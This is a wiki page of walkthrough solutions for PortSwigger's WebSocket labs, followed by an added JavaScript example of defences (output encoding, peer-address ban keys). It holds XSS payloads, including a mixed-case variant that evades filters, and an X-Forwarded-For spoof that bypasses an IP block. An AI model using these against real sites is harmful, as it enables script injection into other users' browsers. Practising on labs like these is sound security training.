WebSockets
Alnoman Kamil edited this page Oct 29, 2024 · 7 revisions
Apprentice lab:
Manipulating WebSocket messages to exploit vulnerabilities
This online shop has a live chat feature implemented using WebSockets.
Chat messages that you submit are viewed by a support agent in real time.
To solve the lab, use a WebSocket message to trigger an alert()
popup in the support agent's browser.
Solution
- Go to Live chat and type a message. Before sending, intercept the request.
- Edit the WebSocket message (ef), adding an onerror XSS payload:
  {"message":"<img src=x onerror=alert(1)>"}
- Forward all requests (A).
Practitioner lab:
Manipulating the WebSocket handshake to exploit vulnerabilities
Solution
- Go to live chat and try an XSS payload:
  <img src=1 onerror='alert(1);'>
- The system will detect the attack. Trying X-Forwarded-For: 234 works.
- Set the X-Forwarded-For header for every request:
  : set modify_headers /X-Forwarded-For/1234
- Try an obfuscated XSS payload:
  <img src=1 oNeRrOr=alert`1`;>
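A defender's view of both labs, as an added example that is not part of the original page or of the lab's code: a case-sensitive blocklist lets the mixed-case payload through, encoding on output neutralizes both payloads, and a client block keyed on the TCP peer address ignores a client-supplied X-Forwarded-For. The filter, the function names, the sample addresses and the assumption that the block is keyed on client address are all hypothetical.

```javascript
// Added example: hypothetical server-side handling for a WebSocket chat.
// naiveFilter, encodeHtml, banKey and TRUSTED_PROXIES are assumed names.

// A case-sensitive blocklist, used here as a stand-in for a weak input filter.
function naiveFilter(message) {
  return /onerror=|onload=|<script/.test(message) ? null : message;
}

// Output encoding: the message is kept as sent and encoded when rendered,
// so markup characters reach the agent's browser as text, not as HTML.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
};
function encodeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Ban key: the TCP peer address. X-Forwarded-For from the handshake is used
// only when the peer is a proxy we operate, and then only the right-most
// entry, which is the one that proxy appended.
const TRUSTED_PROXIES = new Set(['10.0.0.5']); // constructed sample value
function banKey(peerAddress, headers) {
  const xff = headers['x-forwarded-for'];
  if (!xff || !TRUSTED_PROXIES.has(peerAddress)) return peerAddress;
  const hops = xff.split(',').map((h) => h.trim()).filter(Boolean);
  return hops.length ? hops[hops.length - 1] : peerAddress;
}

// Handle one chat frame: refuse blocked clients, validate the JSON shape,
// and return HTML that is safe to insert into the agent's chat view.
const banned = new Set();
function handleChatFrame(peerAddress, headers, rawFrame) {
  if (banned.has(banKey(peerAddress, headers))) return { ok: false, reason: 'banned' };
  let parsed;
  try { parsed = JSON.parse(rawFrame); } catch { return { ok: false, reason: 'bad-json' }; }
  if (!parsed || typeof parsed.message !== 'string') return { ok: false, reason: 'bad-shape' };
  return { ok: true, html: '<td>' + encodeHtml(parsed.message) + '</td>' };
}
```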
Solutions for PortSwigger's Web Security Academy using mitmproxy and other CLI tools instead of Burp Suite